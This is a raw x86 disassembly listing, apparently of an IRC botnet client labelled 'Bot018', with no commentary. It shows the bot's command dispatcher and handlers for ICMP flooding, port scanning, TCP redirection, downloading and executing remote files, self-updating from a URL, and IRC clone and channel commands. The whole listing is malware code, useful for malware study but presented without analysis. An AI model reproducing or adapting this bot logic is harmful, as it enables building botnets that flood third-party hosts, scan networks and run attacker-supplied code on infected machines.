push 7
mov edi, eax
mov esi, offset aC_join ; "c_join"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40A86C
push 4
mov edi, eax
mov esi, offset aC_j ; "c_j"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40A86C
push 7
mov edi, eax
mov esi, offset aC_part ; "c_part"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40A806
push 4
mov edi, eax
mov esi, offset aC_p ; "c_p"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40A806
push 7
mov edi, eax
mov esi, offset aRepeat ; "repeat"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40A742
push 3
mov edi, eax
mov esi, offset aRp ; "rp"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40A742
push 6
mov edi, eax
mov esi, offset aDelay ; "delay"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40A6A5
push 3
mov edi, eax
mov esi, offset aDe ; "de"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40A6A5
push 7
mov edi, eax
mov esi, offset aUpdate ; "update"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40A4CE
push 3
mov edi, eax
mov esi, offset aUp ; "up"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40A4CE
push 8
mov edi, eax
mov esi, offset aExecute ; "execute"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40A42B
push 2
mov edi, eax
mov esi, offset aE ; "e"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40A42B
push 7
mov edi, eax
mov esi, offset aRename ; "rename"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40A3D3
push 3
mov edi, eax
mov esi, offset aMv ; "mv"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40A3D3
push 0Ah
mov edi, eax
mov esi, offset aIcmpflood ; "icmpflood"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40A2AF
push 5
mov edi, eax
mov esi, offset aIcmp ; "icmp"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40A2AF
mov ecx, [ebp+ebx+var_98]
test ecx, ecx
mov [ebp+arg_0], ecx
jz loc_407B7B
push 6
mov edi, eax
mov esi, offset aClone_0 ; "clone"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40A1C1
push 2
mov edi, eax
mov esi, offset aC ; "c"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40A1C1
push 9
mov edi, eax
mov esi, offset aDownload ; "download"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40A044
push 3
mov edi, eax
mov esi, offset aDl ; "dl"
pop ecx
xor edx, edx
repe cmpsb
jz loc_40A044
push 9
mov edi, eax
mov esi, offset aRedirect ; "redirect"
pop ecx
xor edx, edx
repe cmpsb
jz loc_409F22
push 3
mov edi, eax
mov esi, offset aRd ; "rd"
pop ecx
xor edx, edx
repe cmpsb
jz loc_409F22
push 5
mov edi, eax
mov esi, offset aScan ; "scan"
pop ecx
xor edx, edx
repe cmpsb
jz loc_409E07
push 3
mov edi, eax
mov esi, offset aSc ; "sc"
pop ecx
xor edx, edx
repe cmpsb
jz loc_409E07
push 0Ah
mov edi, eax
mov esi, offset aC_privmsg ; "c_privmsg"
pop ecx
xor edx, edx
repe cmpsb
jz loc_409D11
push 5
mov edi, eax
mov esi, offset aC_pm ; "c_pm"
pop ecx
xor edx, edx
repe cmpsb
jz loc_409D11
push 9
mov edi, eax
mov esi, offset aC_action ; "c_action"
pop ecx
xor edx, edx
repe cmpsb
jz short loc_409BDD
push 4
mov edi, eax
mov esi, offset dword_425A64
pop ecx
xor edx, edx
repe cmpsb
jnz loc_408D7C
loc_409BDD: ; CODE XREF: sub_4078FA+22CD�j
push [ebp+var_8]
call sub_412F42
imul eax, 234h
cmp byte_434350[eax], 0
pop ecx
jz loc_40CFE2
mov edi, [ebp+var_14]
test edi, edi
jz loc_40CFE2
mov eax, [ebp+var_20]
lea edx, [eax+1]
loc_409C0A: ; CODE XREF: sub_4078FA+2315�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_409C0A
sub eax, edx
mov ebx, eax
mov eax, [ebp+var_8]
lea ecx, [eax+1]
loc_409C1B: ; CODE XREF: sub_4078FA+2326�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_409C1B
sub eax, ecx
mov ecx, eax
mov eax, [ebp+var_10]
lea esi, [eax+1]
loc_409C2C: ; CODE XREF: sub_4078FA+2337�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_409C2C
push [ebp+arg_0]
sub eax, esi
add eax, ecx
add eax, ebx
lea eax, [eax+edi+2]
push eax
call sub_413920
mov esi, eax
push esi
lea eax, [ebp+var_2E0]
push offset dword_425A58
push eax
call sub_412BB5
add esp, 14h
test esi, esi
jz loc_40CFE2
mov edi, [ebp+var_8]
push edi
call sub_412F42
test eax, eax
pop ecx
jle loc_40CFE2
push edi
call sub_412F42
cmp eax, 1F4h
pop ecx
jge loc_40CFE2
xor ebx, ebx
push ebx
push ebx
lea eax, [ebp+var_2E0]
push eax
push [ebp+var_10]
push edi
call sub_412F42
imul eax, 234h
pop ecx
push dword_434344[eax]
call sub_4045DD
push edi
call sub_412F42
imul eax, 234h
add esp, 18h
cmp byte ptr dword_434138[eax], 73h
jnz loc_40CFE2
push esi
push edi
call sub_412F42
imul eax, 234h
pop ecx
add eax, offset byte_434350
push eax
push [ebp+var_10]
push offset aSSS_2 ; "[%s] * %s %s"
loc_409CE7: ; CODE XREF: sub_4078FA+2508�j
lea eax, [ebp+var_2E0]
push eax
call sub_412BB5
push ebx
push [ebp+var_4]
lea eax, [ebp+var_2E0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_4045DD
jmp loc_40BBEB
; ---------------------------------------------------------------------------
loc_409D11: ; CODE XREF: sub_4078FA+22A5�j
; sub_4078FA+22B9�j
push [ebp+var_8]
call sub_412F42
imul eax, 234h
cmp byte_434350[eax], 0
pop ecx
jz loc_40CFE2
mov edi, [ebp+var_14]
test edi, edi
jz loc_40CFE2
mov eax, [ebp+var_20]
lea edx, [eax+1]
loc_409D3E: ; CODE XREF: sub_4078FA+2449�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_409D3E
sub eax, edx
mov ebx, eax
mov eax, [ebp+var_8]
lea ecx, [eax+1]
loc_409D4F: ; CODE XREF: sub_4078FA+245A�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_409D4F
sub eax, ecx
mov ecx, eax
mov eax, [ebp+var_10]
lea esi, [eax+1]
loc_409D60: ; CODE XREF: sub_4078FA+246B�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_409D60
push [ebp+arg_0]
sub eax, esi
add eax, ecx
add eax, ebx
lea eax, [eax+edi+2]
push eax
call sub_413920
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz loc_40CFE2
mov edi, [ebp+var_8]
push edi
call sub_412F42
test eax, eax
pop ecx
jle loc_40CFE2
push edi
call sub_412F42
cmp eax, 1F4h
pop ecx
jge loc_40CFE2
xor ebx, ebx
push ebx
push ebx
push esi
push [ebp+var_10]
push edi
call sub_412F42
imul eax, 234h
pop ecx
push dword_434344[eax]
call sub_4045DD
push edi
call sub_412F42
imul eax, 234h
add esp, 18h
cmp byte ptr dword_434138[eax], 73h
jnz loc_40CFE2
push esi
push edi
call sub_412F42
imul eax, 234h
pop ecx
add eax, offset byte_434350
push eax
push [ebp+var_10]
push offset aSSS_1 ; "[%s] <%s> %s"
jmp loc_409CE7
; ---------------------------------------------------------------------------
loc_409E07: ; CODE XREF: sub_4078FA+227D�j
; sub_4078FA+2291�j
push [ebp+var_8]
call dword_433514
push [ebp+var_10]
mov [ebp+var_2F8], eax
call sub_412F42
push [ebp+arg_0]
mov [ebp+var_304], eax
call sub_412F42
mov edi, [ebp+arg_4]
push 7Fh
push [ebp+var_9C]
mov [ebp+var_300], eax
lea eax, [ebp+var_384]
push eax
mov [ebp+var_388], edi
call sub_412C40
mov eax, [ebp+var_C]
mov ebx, [ebp+var_4]
add esp, 14h
push [ebp+var_300]
mov [ebp+var_2F0], ebx
push [ebp+var_304]
mov [ebp+var_2EC], eax
push [ebp+var_2F8]
call dword_433520
push eax
lea eax, [ebp+var_2E0]
push offset aScanPortScanSt ; "[SCAN]: Port scan started: %s:%d with d"...
push eax
call sub_412BB5
xor esi, esi
push esi
lea eax, [ebp+var_2E0]
push 9
push eax
call sub_410EEA
add esp, 20h
mov [ebp+var_2FC], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_388]
push eax
push offset sub_40E8FF
push esi
push esi
call ds:dword_41F00C
mov ecx, [ebp+var_2FC]
imul ecx, 234h
cmp eax, esi
mov dword_43434C[ecx], eax
jnz short loc_409F18
call ds:dword_41F008
push eax
lea eax, [ebp+var_2E0]
push offset aScanFailedTo_0 ; "[SCAN]: Failed to start scan thread, er"...
push eax
call sub_412BB5
add esp, 0Ch
loc_409EF2: ; CODE XREF: sub_4078FA+2626�j
cmp [ebp+var_C], esi
jnz loc_40C4A1
push esi
push ebx
lea eax, [ebp+var_2E0]
push eax
push [ebp+var_9C]
push edi
jmp loc_40C499
; ---------------------------------------------------------------------------
loc_409F10: ; CODE XREF: sub_4078FA+2624�j
push 32h
call ds:dword_41F000
loc_409F18: ; CODE XREF: sub_4078FA+25DB�j
cmp [ebp+var_2E8], esi
jz short loc_409F10
jmp short loc_409EF2
; ---------------------------------------------------------------------------
loc_409F22: ; CODE XREF: sub_4078FA+2255�j
; sub_4078FA+2269�j
push [ebp+var_8]
call sub_412F42
push 7Fh
push [ebp+var_10]
mov [ebp+var_FD0], eax
lea eax, [ebp+var_10D4]
push eax
call sub_412C40
push [ebp+arg_0]
call sub_412F42
push [ebp+var_9C]
mov esi, [ebp+arg_4]
mov [ebp+var_FD4], eax
lea eax, [ebp+var_1054]
push 80h
push eax
mov [ebp+var_10DC], esi
call sub_412E0D
mov eax, [ebp+var_C]
mov ebx, [ebp+var_4]
add esp, 20h
push [ebp+var_FD4]
mov [ebp+var_FC0], eax
lea eax, [ebp+var_10D4]
push eax
push [ebp+var_FD0]
mov [ebp+var_FC4], ebx
push esi
call sub_406C33
pop ecx
push eax
lea eax, [ebp+var_2E0]
push offset aRedirectTcpRed ; "[REDIRECT]: TCP redirect created from: "...
push eax
call sub_412BB5
xor edi, edi
push edi
lea eax, [ebp+var_2E0]
push 11h
push eax
call sub_410EEA
add esp, 24h
mov [ebp+var_FCC], eax
lea eax, [ebp+var_18]
push eax
push edi
lea eax, [ebp+var_10DC]
push eax
push offset sub_40D9BC
push edi
push edi
call ds:dword_41F00C
mov ecx, [ebp+var_FCC]
imul ecx, 234h
cmp eax, edi
mov dword_43434C[ecx], eax
jnz short loc_40A03A
call ds:dword_41F008
push eax
push offset aRedirectFailed ; "[REDIRECT]: Failed to start redirection"...
loc_40A005: ; CODE XREF: sub_4078FA+28AD�j
; sub_4078FA+3FD1�j ...
lea eax, [ebp+var_2E0]
push eax
call sub_412BB5
add esp, 0Ch
loc_40A014: ; CODE XREF: sub_4078FA+2748�j
; sub_4078FA+28C2�j ...
cmp [ebp+var_C], edi
jnz loc_40C4A1
push edi
push ebx
lea eax, [ebp+var_2E0]
push eax
push [ebp+var_9C]
push esi
jmp loc_40C499
; ---------------------------------------------------------------------------
loc_40A032: ; CODE XREF: sub_4078FA+2746�j
push 32h
call ds:dword_41F000
loc_40A03A: ; CODE XREF: sub_4078FA+26FD�j
cmp [ebp+var_FBC], edi
jz short loc_40A032
jmp short loc_40A014
; ---------------------------------------------------------------------------
loc_40A044: ; CODE XREF: sub_4078FA+222D�j
; sub_4078FA+2241�j
mov esi, 0FFh
push esi
push [ebp+var_8]
lea eax, [ebp+var_F28]
push eax
call sub_412C40
push [ebp+arg_0]
xor edi, edi
mov [ebp+var_C24], edi
call sub_412F42
mov [ebp+var_C20], eax
mov eax, [ebp+ebx+var_94]
add esp, 10h
cmp eax, edi
jz short loc_40A091
push 10h
push edi
push eax
call sub_413809
add esp, 0Ch
mov [ebp+var_C18], eax
jmp short loc_40A097
; ---------------------------------------------------------------------------
loc_40A091: ; CODE XREF: sub_4078FA+2781�j
mov [ebp+var_C18], edi
loc_40A097: ; CODE XREF: sub_4078FA+2795�j
mov ebx, [ebp+ebx+var_90]
cmp ebx, edi
jz short loc_40A0B1
push ebx
call sub_412F42
pop ecx
mov [ebp+var_C1C], eax
jmp short loc_40A0B7
; ---------------------------------------------------------------------------
loc_40A0B1: ; CODE XREF: sub_4078FA+27A6�j
mov [ebp+var_C1C], edi
loc_40A0B7: ; CODE XREF: sub_4078FA+27B5�j
push 3Fh
push [ebp+var_10]
call sub_413F30
mov ebx, eax
cmp ebx, edi
pop ecx
pop ecx
jz short loc_40A0F1
and byte ptr [ebx], 0
inc ebx
loc_40A0CD: ; CODE XREF: sub_4078FA+27E4�j
push 26h
push ebx
call sub_413F30
cmp eax, edi
pop ecx
pop ecx
jz short loc_40A0E0
mov byte ptr [eax], 20h
jmp short loc_40A0CD
; ---------------------------------------------------------------------------
loc_40A0E0: ; CODE XREF: sub_4078FA+27DF�j
push esi
lea eax, [ebp+var_D28]
push ebx
push eax
call sub_412C40
add esp, 0Ch
loc_40A0F1: ; CODE XREF: sub_4078FA+27CD�j
push esi
push [ebp+var_10]
lea eax, [ebp+var_E28]
push eax
call sub_412C40
movzx eax, [ebp+var_447]
mov esi, [ebp+arg_4]
push 7Fh
push [ebp+var_9C]
mov [ebp+var_C14], eax
lea eax, [ebp+var_FA8]
push eax
mov [ebp+var_FAC], esi
call sub_412C40
push [ebp+var_10]
mov eax, [ebp+var_C]
push [ebp+var_8]
mov ebx, [ebp+var_4]
mov [ebp+var_C10], eax
lea eax, [ebp+var_2E0]
push offset aDownloadDown_1 ; "[DOWNLOAD]: Downloading URL: %s to: %s."...
push eax
mov [ebp+var_C0C], ebx
call sub_412BB5
push esi
lea eax, [ebp+var_2E0]
push 16h
push eax
call sub_410EEA
add esp, 34h
mov [ebp+var_C28], eax
lea eax, [ebp+var_18]
push eax
push edi
lea eax, [ebp+var_FAC]
push eax
push offset sub_401F06
push edi
push edi
call ds:dword_41F00C
mov ecx, [ebp+var_C28]
imul ecx, 234h
cmp eax, edi
mov dword_43434C[ecx], eax
jnz short loc_40A1B4
call ds:dword_41F008
push eax
push offset aDownloadFailed ; "[DOWNLOAD]: Failed to start transfer th"...
jmp loc_40A005
; ---------------------------------------------------------------------------
loc_40A1AC: ; CODE XREF: sub_4078FA+28C0�j
push 32h
call ds:dword_41F000
loc_40A1B4: ; CODE XREF: sub_4078FA+289F�j
cmp [ebp+var_C08], edi
jz short loc_40A1AC
jmp loc_40A014
; ---------------------------------------------------------------------------
loc_40A1C1: ; CODE XREF: sub_4078FA+2205�j
; sub_4078FA+2219�j
push 7Fh
push [ebp+var_8]
lea eax, [ebp+var_123C]
push eax
call sub_412C40
push [ebp+var_10]
call sub_412F42
push 3Fh
push [ebp+arg_0]
mov [ebp+var_10EC], eax
lea eax, [ebp+var_11BC]
push eax
call sub_412C40
mov ebx, [ebp+ebx+var_94]
xor esi, esi
add esp, 1Ch
cmp ebx, esi
jz short loc_40A213
push 3Fh
lea eax, [ebp+var_117C]
push ebx
push eax
call sub_412C40
add esp, 0Ch
loc_40A213: ; CODE XREF: sub_4078FA+2905�j
lea eax, [ebp+var_11BC]
push eax
push [ebp+var_10EC]
lea eax, [ebp+var_123C]
push eax
lea eax, [ebp+var_2E0]
push offset aClonesCreatedO ; "[CLONES]: Created on %s:%d, in channel "...
push eax
mov [ebp+var_10E8], 1
call sub_412BB5
push esi
lea eax, [ebp+var_2E0]
push 18h
push eax
call sub_410EEA
add esp, 20h
mov [ebp+var_10E4], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_1240]
push eax
push offset sub_40779B
push esi
push esi
call ds:dword_41F00C
mov ecx, [ebp+var_10E4]
imul ecx, 234h
cmp eax, esi
mov dword_43434C[ecx], eax
jnz short loc_40A2A2
call ds:dword_41F008
push eax
push offset aClonesFailedTo ; "[CLONES]: Failed to start clone thread,"...
jmp loc_40AF46
; ---------------------------------------------------------------------------
loc_40A29A: ; CODE XREF: sub_4078FA+29AE�j
push 32h
call ds:dword_41F000
loc_40A2A2: ; CODE XREF: sub_4078FA+298D�j
cmp [ebp+var_10E0], esi
jz short loc_40A29A
jmp loc_40AF55
; ---------------------------------------------------------------------------
loc_40A2AF: ; CODE XREF: sub_4078FA+21CB�j
; sub_4078FA+21DF�j
push [ebp+var_10]
call sub_412F42
mov ebx, [ebp+arg_4]
xor edi, edi
cmp eax, edi
pop ecx
mov [ebp+var_1358], eax
jle loc_40A3AE
push [ebp+var_8]
mov esi, 80h
lea eax, [ebp+var_14E0]
push esi
push eax
call sub_412E0D
push [ebp+var_9C]
xor eax, eax
cmp [ebp+var_43A], al
push esi
setnz al
mov [ebp+var_14E4], ebx
mov [ebp+var_1354], eax
lea eax, [ebp+var_13E0]
push eax
call sub_412E0D
push [ebp+var_10]
mov eax, [ebp+var_4]
push [ebp+var_8]
mov [ebp+var_1350], eax
mov eax, [ebp+var_C]
push offset aIcmpFloodingSF ; "[ICMP]: Flooding: (%s) for %s seconds."
mov [ebp+var_134C], eax
lea eax, [ebp+var_2E0]
push 200h
push eax
call sub_412E0D
push edi
lea eax, [ebp+var_2E0]
push 0Eh
push eax
call sub_410EEA
add esp, 38h
mov [ebp+var_1360], eax
lea eax, [ebp+var_18]
push eax
push edi
lea eax, [ebp+var_14E4]
push eax
push offset sub_404249
push edi
push edi
call ds:dword_41F00C
mov ecx, [ebp+var_1360]
imul ecx, 234h
cmp eax, edi
mov dword_43434C[ecx], eax
jnz short loc_40A3A4
call ds:dword_41F008
push eax
lea eax, [ebp+var_2E0]
push offset aIcmpFailedToSt ; "[ICMP]: Failed to start flood thread, e"...
push eax
call sub_412BB5
add esp, 0Ch
jmp short loc_40A3C1
; ---------------------------------------------------------------------------
loc_40A39C: ; CODE XREF: sub_4078FA+2AB0�j
push 32h
call ds:dword_41F000
loc_40A3A4: ; CODE XREF: sub_4078FA+2A83�j
cmp [ebp+var_1348], edi
jz short loc_40A39C
jmp short loc_40A3C1
; ---------------------------------------------------------------------------
loc_40A3AE: ; CODE XREF: sub_4078FA+29CB�j
lea eax, [ebp+var_2E0]
push offset aIcmpInvalidFlo ; "[ICMP]: Invalid flood time must be grea"...
push eax
call sub_412BB5
pop ecx
pop ecx
loc_40A3C1: ; CODE XREF: sub_4078FA+2AA0�j
; sub_4078FA+2AB2�j
cmp [ebp+var_C], edi
jnz loc_40C4A1
push edi
push [ebp+var_4]
jmp loc_40CB44
; ---------------------------------------------------------------------------
loc_40A3D3: ; CODE XREF: sub_4078FA+21A3�j
; sub_4078FA+21B7�j
push [ebp+var_10]
push [ebp+var_8]
call ds:dword_41F0CC
test eax, eax
jz short loc_40A407
push [ebp+var_10]
lea eax, [ebp+var_2E0]
push [ebp+var_8]
push offset aFileRenameSToS ; "[FILE]: Rename: '%s' to: '%s'."
push 200h
push eax
call sub_412E0D
add esp, 14h
jmp loc_40C47E
; ---------------------------------------------------------------------------
loc_40A407: ; CODE XREF: sub_4078FA+2AE7�j
push offset aFile ; "[FILE]:"
call sub_405708
push eax
lea eax, [ebp+var_2E0]
push 200h
push eax
call sub_412E0D
add esp, 10h
jmp loc_40C47E
; ---------------------------------------------------------------------------
loc_40A42B: ; CODE XREF: sub_4078FA+217B�j
; sub_4078FA+218F�j
push 11h
pop ecx
push [ebp+var_8]
xor eax, eax
xor ebx, ebx
lea edi, [ebp+var_3F0]
rep stosd
inc ebx
xor esi, esi
mov [ebp+var_3F0], 44h
mov [ebp+var_3C4], ebx
mov word ptr [ebp+var_3C0], si
call sub_412F42
cmp eax, ebx
pop ecx
jnz short loc_40A46A
mov word ptr [ebp+var_3C0], 5
loc_40A46A: ; CODE XREF: sub_4078FA+2B65�j
cmp [ebp+var_14], esi
jz loc_40AF55
push [ebp+var_10]
push [ebp+var_14]
call sub_413920
mov edi, eax
cmp edi, esi
pop ecx
pop ecx
jz loc_40AF55
lea eax, [ebp+var_A64]
push eax
lea eax, [ebp+var_3F0]
push eax
push esi
push esi
push 30h
push ebx
push esi
push esi
push edi
push esi
call ds:dword_41F030
test eax, eax
lea eax, [ebp+var_2E0]
jnz short loc_40A4C3
push offset aExecCouldnTExe ; "[EXEC]: Couldn't execute file."
push eax
call sub_412BB5
pop ecx
pop ecx
jmp loc_40AF55
; ---------------------------------------------------------------------------
loc_40A4C3: ; CODE XREF: sub_4078FA+2BB5�j
push edi
push offset aExecCommandsS ; "[EXEC]: Commands: %s"
jmp loc_40AF4C
; ---------------------------------------------------------------------------
loc_40A4CE: ; CODE XREF: sub_4078FA+2153�j
; sub_4078FA+2167�j
mov edi, [ebp+var_10]
mov esi, offset aBot018 ; "Bot018"
loc_40A4D6: ; CODE XREF: sub_4078FA+2BF8�j
mov cl, [esi]
mov al, cl
cmp cl, [edi]
jnz short loc_40A4F8
test al, al
jz short loc_40A4F4
mov cl, [esi+1]
mov al, cl
cmp cl, [edi+1]
jnz short loc_40A4F8
inc esi
inc esi
inc edi
inc edi
test al, al
jnz short loc_40A4D6
loc_40A4F4: ; CODE XREF: sub_4078FA+2BE6�j
xor eax, eax
jmp short loc_40A4FD
; ---------------------------------------------------------------------------
loc_40A4F8: ; CODE XREF: sub_4078FA+2BE2�j
; sub_4078FA+2BF0�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_40A4FD: ; CODE XREF: sub_4078FA+2BFC�j
test eax, eax
mov edi, [ebp+arg_4]
jz loc_40A670
lea eax, [ebp+var_B74]
push eax
push 104h
call ds:dword_41F0A4
push 0FFh
push [ebp+var_8]
lea eax, [ebp+var_F28]
push eax
call sub_412C40
lea eax, [ebp+var_A70]
push eax
call sub_40E4F3
push eax
lea eax, [ebp+var_B74]
push eax
lea eax, [ebp+var_E28]
push offset aSS_exe ; "%s%s.exe"
push eax
call sub_412BB5
mov eax, [ebp+ebx+var_98]
xor esi, esi
add esp, 20h
cmp eax, esi
mov [ebp+var_C24], 1
mov [ebp+var_C20], esi
jz short loc_40A587
push 10h
push esi
push eax
call sub_413809
add esp, 0Ch
mov [ebp+var_C18], eax
jmp short loc_40A58D
; ---------------------------------------------------------------------------
loc_40A587: ; CODE XREF: sub_4078FA+2C77�j
mov [ebp+var_C18], esi
loc_40A58D: ; CODE XREF: sub_4078FA+2C8B�j
mov ebx, [ebp+ebx+var_94]
cmp ebx, esi
jz short loc_40A5A7
push ebx
call sub_412F42
pop ecx
mov [ebp+var_C1C], eax
jmp short loc_40A5AD
; ---------------------------------------------------------------------------
loc_40A5A7: ; CODE XREF: sub_4078FA+2C9C�j
mov [ebp+var_C1C], esi
loc_40A5AD: ; CODE XREF: sub_4078FA+2CAB�j
movzx eax, [ebp+var_447]
push 7Fh
push [ebp+var_9C]
mov [ebp+var_C14], eax
lea eax, [ebp+var_FA8]
push eax
mov [ebp+var_FAC], edi
call sub_412C40
mov eax, [ebp+var_4]
push [ebp+var_8]
mov [ebp+var_C0C], eax
mov eax, [ebp+var_C]
mov [ebp+var_C10], eax
lea eax, [ebp+var_2E0]
push offset aUpdateDownload ; "[UPDATE]: Downloading update from: %s."
push eax
call sub_412BB5
push edi
lea eax, [ebp+var_2E0]
push 17h
push eax
call sub_410EEA
add esp, 24h
mov [ebp+var_C28], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_FAC]
push eax
push offset sub_401F06
push esi
push esi
call ds:dword_41F00C
mov ecx, [ebp+var_C28]
imul ecx, 234h
cmp eax, esi
mov dword_43434C[ecx], eax
jnz short loc_40A666
call ds:dword_41F008
push eax
lea eax, [ebp+var_2E0]
push offset aUpdateFailedTo ; "[UPDATE]: Failed to start download thre"...
push eax
call sub_412BB5
add esp, 0Ch
jmp short loc_40A685
; ---------------------------------------------------------------------------
loc_40A65E: ; CODE XREF: sub_4078FA+2D72�j
push 32h
call ds:dword_41F000
loc_40A666: ; CODE XREF: sub_4078FA+2D45�j
cmp [ebp+var_C08], esi
jz short loc_40A65E
jmp short loc_40A685
; ---------------------------------------------------------------------------
loc_40A670: ; CODE XREF: sub_4078FA+2C08�j
lea eax, [ebp+var_2E0]
push offset aUpdateUpToDate ; "[UPDATE]: Up to Date"
push eax
call sub_412BB5
pop ecx
pop ecx
xor esi, esi
loc_40A685: ; CODE XREF: sub_4078FA+2D62�j
; sub_4078FA+2D74�j
cmp [ebp+var_C], esi
jnz loc_409015
push esi
push [ebp+var_4]
lea eax, [ebp+var_2E0]
push eax
push [ebp+var_9C]
push edi
jmp loc_40900D
; ---------------------------------------------------------------------------
loc_40A6A5: ; CODE XREF: sub_4078FA+212B�j
; sub_4078FA+213F�j
mov edi, [ebp+var_A0]
push 4
mov esi, offset dword_4263EC
pop ecx
xor eax, eax
repe cmpsb
jz loc_407B7B
cmp [ebp+var_14], eax
jz loc_407B7B
push [ebp+var_10]
push [ebp+var_14]
call sub_413920
push eax
push [ebp+var_9C]
lea eax, [ebp+var_2E0]
push [ebp+var_A0]
push [ebp+var_A4]
push offset aSSSS ; "%s %s %s :%s"
push eax
call sub_412BB5
push 1FFh
lea eax, [ebp+var_2E0]
push eax
push [ebp+arg_0]
call sub_412C40
push [ebp+var_8]
call sub_412F42
add esp, 30h
test eax, eax
jle short loc_40A72E
push [ebp+var_8]
call sub_412F42
imul eax, 3E8h
pop ecx
push eax
call ds:dword_41F000
loc_40A72E: ; CODE XREF: sub_4078FA+2E1C�j
push offset aMainDelay_ ; "[MAIN]: Delay."
call sub_401C33
mov eax, [ebp+arg_24]
pop ecx
inc eax
jmp loc_407B7E
; ---------------------------------------------------------------------------
loc_40A742: ; CODE XREF: sub_4078FA+2103�j
; sub_4078FA+2117�j
mov edi, [ebp+var_A0]
push 4
mov esi, offset dword_4263EC
pop ecx
xor eax, eax
repe cmpsb
jz loc_407B7B
cmp [ebp+var_14], eax
jz loc_40CFE2
mov esi, [ebp+var_10]
push esi
push [ebp+var_14]
call sub_413920
pop ecx
pop ecx
mov ebx, eax
push 7
inc esi
pop ecx
xor eax, eax
mov edi, offset aRepeat ; "repeat"
repe cmpsb
lea eax, [ebp+var_2E0]
push ebx
jz short loc_40A7FC
push [ebp+var_9C]
push [ebp+var_A0]
push [ebp+var_A4]
push offset aSSSS ; "%s %s %s :%s"
push eax
call sub_412BB5
push 1FFh
lea eax, [ebp+var_2E0]
push eax
push [ebp+arg_0]
call sub_412C40
push ebx
lea eax, [ebp+var_2E0]
push offset aMainRepeatS ; "[MAIN]: Repeat: %s"
push eax
call sub_412BB5
lea eax, [ebp+var_2E0]
push eax
call sub_401C33
push [ebp+var_8]
call sub_412F42
add esp, 38h
test eax, eax
jle loc_40CFE2
push [ebp+var_8]
call sub_412F42
add eax, [ebp+arg_24]
pop ecx
jmp loc_407B7E
; ---------------------------------------------------------------------------
loc_40A7FC: ; CODE XREF: sub_4078FA+2E8D�j
push offset aMainRepeatNotA ; "[MAIN]: Repeat not allowed in command l"...
jmp loc_40AD66
; ---------------------------------------------------------------------------
loc_40A806: ; CODE XREF: sub_4078FA+20DB�j
; sub_4078FA+20EF�j
push [ebp+var_10]
lea eax, [ebp+var_2E0]
push offset aPartS_0 ; "PART %s"
push eax
call sub_412BB5
push [ebp+var_8]
call sub_412F42
add esp, 10h
loc_40A825: ; CODE XREF: sub_4078FA+2F98�j
test eax, eax
jle loc_40CFE2
push [ebp+var_8]
call sub_412F42
cmp eax, 1F4h
pop ecx
jge loc_40CFE2
loc_40A841: ; CODE XREF: sub_4078FA+37D1�j
lea eax, [ebp+var_2E0]
push eax
push offset aS_4 ; "%s\r\n"
push [ebp+var_8]
call sub_412F42
imul eax, 234h
pop ecx
push dword_434344[eax]
call sub_404592
jmp loc_40C133
; ---------------------------------------------------------------------------
loc_40A86C: ; CODE XREF: sub_4078FA+20B3�j
; sub_4078FA+20C7�j
push [ebp+ebx+var_98]
lea eax, [ebp+var_2E0]
push [ebp+var_10]
push offset aJoinSS ; "JOIN %s %s"
push eax
call sub_412BB5
push [ebp+var_8]
call sub_412F42
add esp, 14h
jmp short loc_40A825
; ---------------------------------------------------------------------------
loc_40A894: ; CODE XREF: sub_4078FA+208B�j
; sub_4078FA+209F�j
push [ebp+var_10]
loc_40A897: ; DATA XREF: .data:0042BD1C�o
; .data:0042BD60�o ...
lea eax, [ebp+var_2E0]
push offset aNickS ; "NICK %s"
push eax
call sub_412BB5
mov esi, [ebp+var_8]
push esi
call sub_412F42
add esp, 10h
test eax, eax
jle loc_40CFE2
push esi
call sub_412F42
cmp eax, 1F4h
pop ecx
jge loc_40CFE2
lea eax, [ebp+var_2E0]
push eax
push offset aS_4 ; "%s\r\n"
push esi
call sub_412F42
imul eax, 234h
pop ecx
push dword_434344[eax]
call sub_404592
push [ebp+var_10]
push esi
push offset aCloneNickSS ; "[CLONE]: Nick (%s): %s"
loc_40A8FB: ; CODE XREF: sub_4078FA+308C�j
; sub_4078FA+30FB�j ...
call sub_401CA7
jmp loc_40BDF5
; ---------------------------------------------------------------------------
loc_40A905: ; CODE XREF: sub_4078FA+2063�j
; sub_4078FA+2077�j
cmp [ebp+var_14], 0
jz loc_40CFE2
push [ebp+var_10]
push [ebp+var_14]
call sub_413920
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz short loc_40A937
push esi
lea eax, [ebp+var_2E0]
push offset aModeS ; "MODE %s"
push eax
call sub_412BB5
add esp, 0Ch
loc_40A937: ; CODE XREF: sub_4078FA+3026�j
mov edi, [ebp+var_8]
push edi
call sub_412F42
test eax, eax
pop ecx
jle loc_40CFE2
push edi
call sub_412F42
cmp eax, 1F4h
pop ecx
jge loc_40CFE2
lea eax, [ebp+var_2E0]
push eax
push offset aS_4 ; "%s\r\n"
push edi
